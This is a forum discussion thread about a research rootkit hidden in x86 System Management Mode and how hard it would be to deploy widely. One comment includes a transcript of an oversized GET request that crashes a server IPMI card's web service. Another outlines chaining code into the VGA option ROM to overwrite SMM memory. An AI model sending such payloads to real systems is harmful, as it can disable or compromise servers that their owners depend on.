Hiding a Rootkit In System Management Mode

Sniper223 notes a PC World article on a new kind of rootkit recently developed by researchers, which will be demoed at Black Hat in August. The rootkit runs in System Management Mode, a longtime feature of x86 architecture that allows for code to run in a locked part of memory. It is said to be harder to detect, potentially, than VM-based rootkits. The article notes that the technique is unlikely to lead to widespread expoitation: "Being divorced from the operating system makes the SMM rootkit stealthy, but it also means that hackers have to write this driver code expressly for the system they are attacking."

Difficult in practice

In theory, SMM is the ultimate rootkit hiding place. In practice, it's difficult to exploit on a wide scale. Getting the system to execute rootkit code in SMM isn't easy. You're going to need an exploitable BIOS bug, or the ability to reflash the ROM. Either is going to be very system-specific.

Re:Difficult in practice

[moteyalpha]

This is one area where I have worked a bit and there is tremendous potential for abuse of VMM and SMM when you combine it with users that trust a company to deliver binaries. I will not use a binary program, unless I have the source and can verify it is legitimate. A bit of social engineering and the right picture and an uninformed user will be flashing their BIOS while they wait for the security update they think they are getting. If it is done right, this type of program can remain dormant and use no CPU time to give itself away, until it is keyed to act in something like a bot net or some other purpose.

IPMI Card Vulnerabilities

[landonf]

What about vulnerabilities in onboard IPMI cards? Our new servers have ARM-based cards running Linux. The built-in HTTP server is vulnerable to a widely-known buffer overflow:

landonf@ahost:~> telnet XXX.XXX.XXX.XXX 80
Trying XXX.XXX.XXX.XXX...
Connected to XXX.XXX.XXX.XXX.
Escape character is '^]'.
GET /x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/ HTTP/1.0
Connection closed by foreign host.
landonf@timor:~> telnet XXX.XXX.XXX.XXX 80
Trying XXX.XXX.XXX.XXX...
telnet: connect to address XXX.XXX.XXX.XXX: Connection refused

Seems like a recipe for compromised data centers, to me. Re-imaging a machine won't touch the IPMI card.

How specific of a target?

[rocketPack]

TFS says the code must be specifically targeted to a particular machine which, on a PC, means a very big challenge.

On a Mac, however, you could easily target a very large number of people using only a very small number of hardware variations. Could this exploit be better suited to Macs than PCs? On the other hand, it also seems like it would be equally easier to detect the problem, since your algorithm can be fairly specific (both in terms of Macs and PCs), since the code needed to exploit would be rather specific.

Re:oooooh scary

FWIW, an even easier vector for stuffing data into the SMM, and not as a BIOS payload (which will be very motherboard specific) is to chain it into the VGA BIOS (which most PCs have..). The VGA bios is nice because it's a very clean interface (as far as option roms go) for getting called and you can chain in the real VGA bios after doing whatever you see fit.

You can even have it trigger on the first BIOS calls of the windows bootloader so that you can easily overwrite the SMM memory regions in a nice and portable way.